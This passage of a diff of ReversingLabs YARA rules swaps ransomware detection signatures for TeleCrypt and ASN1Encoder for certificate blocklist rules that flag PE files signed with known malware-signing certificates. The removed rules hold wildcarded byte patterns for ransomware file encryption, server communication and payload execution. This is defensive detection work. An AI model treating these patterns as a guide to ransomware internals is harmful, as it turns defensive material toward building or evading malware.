75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? - ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 C8 - 8B 41 ?? 83 C8 ?? 83 79 ?? ?? 75 ?? 83 C8 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D - 45 ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? - C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? - ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? - ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 C4 ?? 8B 85 ?? - ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 - ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? - C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? - ?? ?? 8D 45 ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF - 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? C7 45 ?? ?? ?? - ?? ?? 66 89 45 ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? - ?? 59 5F 5E 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and $ping_apnic and $remote_server_connection_1 and $remote_server_connection_2 and $remote_server_connection_3 and $remote_server_connection_4 and $encrypt_file + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "RocketMedia S.r.l." and pe.signatures[i].serial=="0a:20:89" and 1050073884<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Telecrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1F84E030A0Ed10D5Ffe2B81B : INFO FILE { meta: - description = "Yara rule that detects TeleCrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "c4eada2d-72c0-5efe-bf2b-8f053348d89d" - date = "2020-07-15" - modified = "2020-07-15" + id = "170dae5a-ed7e-5f20-9ccd-94724e4b2084" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.TeleCrypt.yara#L1-L109" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "9d856eae4369cd7ba1d88bd6ef37931e069127e2c05a84a44f5274f681e83fc0" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17142-L17158" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "097655cb2965ae71efb905ddf20ed30c240d25e03d08a1b6c87b472533ccc9d8" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "TeleCrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_file = { - 57 E8 ?? ?? ?? ?? 89 03 EB ?? 6A ?? E8 ?? ?? ?? ?? 89 03 66 83 BB ?? ?? ?? ?? ?? 0F - 85 ?? ?? ?? ?? 8B 03 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 66 81 7B ?? ?? ?? 75 ?? E8 ?? - ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 - ?? ?? ?? ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 43 ?? ?? ?? - ?? ?? 6A ?? 68 ?? ?? ?? ?? 52 6A ?? 6A ?? 50 8D 43 ?? 50 E8 ?? ?? ?? ?? 83 F8 ?? 75 - ?? 66 C7 43 ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 89 03 66 81 7B ?? ?? ?? 0F - 85 ?? ?? ?? ?? 66 C7 43 ?? ?? ?? 6A ?? 8B 03 50 E8 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? - 8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 85 FF 7D ?? 33 FF 6A ?? - 6A ?? 57 8B 03 50 E8 ?? ?? ?? ?? 40 74 ?? 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 8D 83 - ?? ?? ?? ?? 50 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 E9 ?? - ?? ?? ?? F6 43 ?? ?? 74 ?? 83 3C 24 ?? 76 ?? 8B 14 24 4A 85 D2 72 ?? 42 33 FF 8D 83 - ?? ?? ?? ?? 80 38 ?? 75 ?? 6A ?? 6A ?? 8B C7 2B 44 24 ?? 50 8B 03 50 E8 ?? ?? ?? ?? - 40 74 ?? 8B 03 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B C3 E8 ?? ?? ?? ?? 8B F0 EB ?? 47 40 - 4A 75 ?? 66 83 BB ?? ?? ?? ?? ?? 75 ?? 0F B7 05 ?? ?? ?? ?? 66 89 83 ?? ?? ?? ?? 66 - 81 7B ?? ?? ?? 74 ?? 8B 03 50 E8 - } - $server_communication = { - 6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A - ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? - ?? FF 75 ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? - 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 80 ?? ?? ?? ?? - 33 C9 E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? B2 ?? A1 ?? - ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 33 DB 8B CB B8 ?? ?? ?? - ?? D3 E0 85 F0 74 ?? 8D 45 ?? 8B D3 66 83 C2 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? ?? ?? 8B 08 FF 51 ?? 43 83 FB ?? 75 ?? A1 ?? ?? - ?? ?? 8B 10 FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B - 38 FF 57 ?? 8B 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 43 4E 75 ?? A1 ?? ?? ?? ?? 8B 10 - FF 52 ?? 8B F0 4E 85 F6 7C ?? 46 33 DB 6A ?? 6A ?? 8D 4D ?? 8B D3 A1 ?? ?? ?? ?? 8B - 38 FF 57 ?? 8B 45 ?? 8B 0D ?? ?? ?? ?? 33 D2 E8 ?? ?? ?? ?? 43 4E 75 ?? 8D 55 ?? B8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? A1 ?? ?? - ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8B 45 ?? 8B 80 ?? ?? ?? ?? 33 C9 BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 55 - ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 - } - $server_communication_1 = { - 55 8B EC 33 C9 51 51 51 51 51 53 8B D8 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 6A - ?? 8D 45 ?? 50 33 C9 BA ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 45 ?? - 50 8D 55 ?? 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? - ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 33 C9 8B 83 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 33 D2 8B 83 ?? ?? ?? ?? 8B 08 FF 91 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $exec_payload = { - 55 68 ?? ?? ?? ?? 64 FF 32 64 89 22 8B 4D ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? - E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? - ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? - 8B 45 ?? E8 ?? ?? ?? ?? 50 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? - ?? ?? C3 - } - $copy_payload = { - 55 8B EC 6A ?? 6A ?? 6A ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? B8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B2 ?? E8 ?? - ?? ?? ?? 84 C0 75 ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? B8 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 - 8D 55 ?? 33 C0 E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 - 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $generate_strings_to_encrypt = { - 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? - E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D - 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? - ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? - ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? - ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 - ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 - 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? - ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? - ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? - ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B - 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? - 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 - ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 - ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? - ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? - 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 - } - condition: - uint16(0)==0x5A4D and (($generate_strings_to_encrypt and $encrypt_file and $server_communication and $exec_payload) or ($encrypt_file and $server_communication_1 and $copy_payload)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="1f:84:e0:30:a0:ed:10:d5:ff:e2:b8:1b" and 1476869735<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Asn1Encoder : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_88346267057C0A82E2F39851D1B9694C : INFO FILE { meta: - description = "Yara rule that detects ASN1Encoder ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5fa361e5-4ab0-5856-92b2-6f434e33c350" - date = "2020-07-15" - modified = "2020-07-15" + id = "3be920eb-7b71-53c4-94b7-0ffc88d14c59" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.ASN1Encoder.yara#L1-L136" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "000fd846fa5f09af19ead4623bb5a8eb51cdb4c751013569bf070710d3e0d61d" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L17160-L17178" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "60acdbad8ad3e1d4a863ce160d93abd0b5e2b214858cba84f7a1b907d2491486" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "ASN1Encoder" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_p1 = { - 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 0F B6 - 84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ?? - 83 C4 ?? 83 C3 ?? 46 83 FE ?? 72 ?? 8B 5C 24 ?? BE ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 50 - 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50 - E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 8B F0 85 FF 74 ?? A1 ?? ?? ?? ?? 0F B6 04 06 50 B8 ?? - ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 C3 ?? 46 3B F7 - 72 ?? 8B 5C 24 ?? A1 ?? ?? ?? ?? BE ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? 56 50 E8 ?? ?? - ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? - ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B FB 8B F0 0F B6 - 84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 57 E8 ?? ?? ?? ?? - 83 C4 ?? 83 C7 ?? 46 83 FE ?? 72 ?? A1 ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? BB ?? ?? ?? - ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ?? ?? - ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ?? - ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 - ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 51 ?? 66 8B 01 - 83 C1 ?? 66 3B C6 75 ?? 2B CA 8B 15 ?? ?? ?? ?? D1 F9 8D 72 ?? 8A 02 42 84 C0 75 ?? - 8B 3D ?? ?? ?? ?? 2B D6 8D 04 0A 8D 34 45 ?? ?? ?? ?? 56 6A ?? FF D7 50 FF 15 ?? ?? - ?? ?? 8B D8 8D 04 36 50 6A ?? 89 5C 24 ?? FF D7 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ?? - ?? 8B F8 FF 35 ?? ?? ?? ?? 89 7C 24 ?? 68 ?? ?? ?? ?? 56 53 E8 ?? ?? ?? ?? 33 C9 89 - } - $remote_connection_p2 = { - 44 24 ?? 83 C4 ?? 89 8C 24 ?? ?? ?? ?? 8B D9 85 C0 7E ?? 8B 44 24 ?? 0F B7 04 58 66 - 89 84 24 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? BE - ?? ?? ?? ?? 83 C3 ?? A5 A5 66 A5 EB ?? 8D 94 24 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ?? - 66 3B C1 75 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3 - A5 8B CA 83 E1 ?? F3 A4 33 C9 8B 7C 24 ?? 43 3B 5C 24 ?? 7C ?? FF 74 24 ?? 51 FF 15 - ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6 FF 35 ?? ?? ?? ?? 33 C0 50 FF 15 ?? ?? ?? ?? - 50 FF D6 8B 5C 24 ?? 53 33 DB 53 FF 15 ?? ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ?? - ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF D6 8B 5C 24 ?? 89 3D ?? ?? - ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF E9 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? - 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57 - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0 - 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 8B F3 89 5C 24 ?? 8D 4E ?? 8A 06 46 84 - C0 75 ?? 8B 3D ?? ?? ?? ?? 2B F1 68 ?? ?? ?? ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 89 - 44 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? - ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B C8 8B F8 3B FE 73 ?? 81 F9 ?? ?? ?? ?? 74 ?? FF 74 - 24 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 04 1F 50 E8 - } - $encrypt_files_p1 = { - 8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 8B CA 83 - E1 ?? 68 ?? ?? ?? ?? F3 A4 50 FF 15 ?? ?? ?? ?? 8B D8 33 FF 89 5C 24 ?? 89 3D ?? ?? - ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FB ?? 74 ?? 85 DB 0F 85 ?? ?? ?? ?? 33 - F6 8D 8C 24 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? BE ?? ?? ?? ?? 50 - 8D 44 24 ?? 8B D6 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B CE E8 ?? ?? ?? ?? 33 D2 - 8D 88 ?? ?? ?? ?? 8D 81 ?? ?? ?? ?? 89 4C 24 ?? 89 44 24 ?? 8B 44 24 ?? C1 E8 ?? 89 - 44 24 ?? 83 C0 ?? 89 44 24 ?? 8B F0 8B C1 F7 F6 40 0F AF 44 24 ?? 50 6A ?? 89 44 24 - ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ?? - ?? ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? - 8D 44 24 ?? 83 C4 ?? 81 C2 ?? ?? ?? ?? B9 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 39 5C 24 ?? 76 ?? 8B 44 24 ?? 8D - 54 24 ?? 8B 4C 24 ?? 2B C3 3B 44 24 ?? 0F 42 F0 8D 84 24 ?? ?? ?? ?? 50 8B 44 24 ?? - 8D 0C 39 68 ?? ?? ?? ?? 03 C3 56 50 E8 ?? ?? ?? ?? 03 7C 24 ?? 83 C4 ?? 03 DE 3B 7C - 24 ?? 72 ?? 33 FF 8D 84 24 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5C 24 ?? 83 FB ?? 74 ?? 85 DB 74 ?? 57 8D 44 24 ?? - 89 7C 24 ?? 8B 3D ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D7 33 F6 8D 44 - } - $encrypt_files_p2 = { - 24 ?? 56 50 FF 74 24 ?? FF 74 24 ?? 53 FF D7 33 FF 68 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6 - FF 74 24 ?? 57 FF 15 ?? ?? ?? ?? 50 FF D6 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E9 ?? ?? ?? - ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 F6 56 53 FF 15 ?? ?? ?? ?? 3D ?? - ?? ?? ?? 76 ?? 39 35 ?? ?? ?? ?? 75 ?? 56 53 FF 15 ?? ?? ?? ?? 56 8B F8 B8 ?? ?? ?? - ?? 56 50 53 2B F8 FF 15 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 56 8D 8C 24 ?? ?? ?? ?? A3 ?? ?? ?? ?? 51 57 50 53 FF 15 ?? ?? ?? ?? 33 C0 50 50 50 - 53 FF 15 ?? ?? ?? ?? 33 F6 8D 84 24 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? - 53 FF 15 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF - 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ?? 89 5C 24 ?? FF 15 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA - ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 85 C9 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? - 50 FF 15 - } - $find_files = { - 53 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 35 ?? ?? ?? ?? FF D6 83 C4 ?? 53 8D 85 ?? - ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF D6 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? - ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83 FE ?? 0F 84 ?? ?? ?? ?? 85 F6 0F 84 ?? ?? - ?? ?? 33 DB B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? - 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 